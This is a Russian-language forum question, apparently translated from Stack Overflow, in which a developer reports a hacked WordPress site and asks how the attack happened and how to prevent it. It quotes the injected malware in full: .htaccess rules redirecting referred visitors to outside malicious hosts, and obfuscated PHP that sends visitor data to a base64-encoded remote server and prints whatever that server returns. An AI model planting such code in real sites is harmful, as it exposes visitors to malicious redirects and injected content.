Я построил сайт для Wordpress для клиента. Через несколько дней клиент сообщил, что сайт заблокирован Google для содержимого вредоносных программ. Когда я просмотрел сайт, я обнаружил некоторые изменения в коде, например .htaccess имел этот код, отличный от предыдущего. Предотвращение вредоносного ПО на моем сайте
RewriteEngine On
RewriteBase/
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]
RewriteRule ^.*$ http://clubatleticoestrada.org.ar/awas.html?h=1110720 [L,R]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase/
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://halisahamiz.com/eehs.html?h=1110720 [L,R]
</IfModule>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase/
RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
RewriteRule ^.*$ http://zabetonom.ru/mhos.html [L,R]
</IfModule>
RewriteEngine On
RewriteBase/
# MCCL
# END MCCL
и index.php contanied это:
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode('aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init($stCurlLink);
}
}
if ($stCurlHandle !== NULL)
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
Как это нападение произошло, и как я могу предотвратить себя в будущем этой атаки?
При восстановлении сайта я обнаружил некоторые файлы вне общедоступной папки Html, которые были затронуты. Теперь, как кто-то управляет этим?
Я думаю, что этот [форум] (http://security.stackexchange.com/) был бы более уместным :) –
Существует так много способов, чтобы это могло произойти. PM мне URL, и я посмотрю, смогу ли я найти какие-либо очевидные проблемы с безопасностью и указать вам в правильном направлении. Или нет, если вам это не нравится. Комментарий выше меня тоже прав. – user1596138
@AdrienLacroix Хорошо .. Я обязательно попробую другой форум. Благодарю. – Codeeater